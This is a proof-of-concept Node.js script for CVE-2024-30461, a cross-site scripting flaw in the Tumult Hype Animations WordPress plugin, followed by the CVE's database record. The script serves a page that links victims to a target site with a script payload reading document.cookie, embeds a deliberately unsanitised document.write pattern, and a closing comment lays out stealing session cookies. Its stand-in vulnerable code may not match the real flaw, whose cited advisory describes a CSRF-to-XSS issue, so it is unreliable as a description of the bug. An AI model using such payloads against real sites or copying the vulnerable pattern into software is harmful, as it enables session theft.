CVE-2024-30461

// CVE-2024-30461 PoC - DOM-Based XSS in Tumult Hype Animations // This PoC demonstrates how an attacker can inject malicious JavaScript // through the tumult_hype_element_tag parameter const http = require('http'); function createMaliciousServer() { const server = http.createServer((req, res) => { // Attacker's page that contains the XSS payload const maliciousUrl = 'http://target-site.com/?tumult_hype_element_tag=<script>alert(document.cookie)</script>'; const html = ` <!DOCTYPE html> <html> <head><title>CVE-2024-30461 PoC</title></head> <body> <h1>DOM-Based XSS PoC</h1> <p>Click the link below to trigger the vulnerability:</p> <a href="${maliciousUrl}">Click Me</a> <script> // Vulnerable code pattern (simplified representation) // The plugin reads user input and writes it to DOM without sanitization var userInput = location.href.split('tumult_hype_element_tag=')[1]; if (userInput) { document.write(decodeURIComponent(userInput)); } </script> </body> </html> `; res.writeHead(200, { 'Content-Type': 'text/html' }); res.end(html); }); server.listen(8888, () => { console.log('PoC server running on http://localhost:8888'); }); } createMaliciousServer(); /* * Attack Scenario: * 1. Attacker crafts a malicious URL with XSS payload in tumult_hype_element_tag parameter * 2. Attacker tricks victim into clicking the link via social engineering * 3. Victim's browser sends request to vulnerable WordPress site * 4. Plugin processes the input and reflects it without proper sanitization * 5. Browser parses the HTML and executes the injected JavaScript * 6. Attacker steals victim's session cookies or performs actions on their behalf */

{"cve": {"id": "CVE-2024-30461", "sourceIdentifier": "[email protected]", "published": "2026-01-05T17:15:43.417", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Tumult Inc Tumult Hype Animations allows DOM-Based XSS.This issue affects Tumult Hype Animations: from n/a through 1.9.11."}, {"lang": "es", "value": "Neutralización Inadecuada de Entrada Durante la Generación de Páginas Web (XSS o 'cross-site scripting') vulnerabilidad en Tumult Inc Tumult Hype Animations permite XSS basado en DOM. Este problema afecta a Tumult Hype Animations: desde n/a hasta 1.9.11."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/plugin/tumult-hype-animations/vulnerability/wordpress-tumult-hype-animations-plugin-1-9-11-csrf-to-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}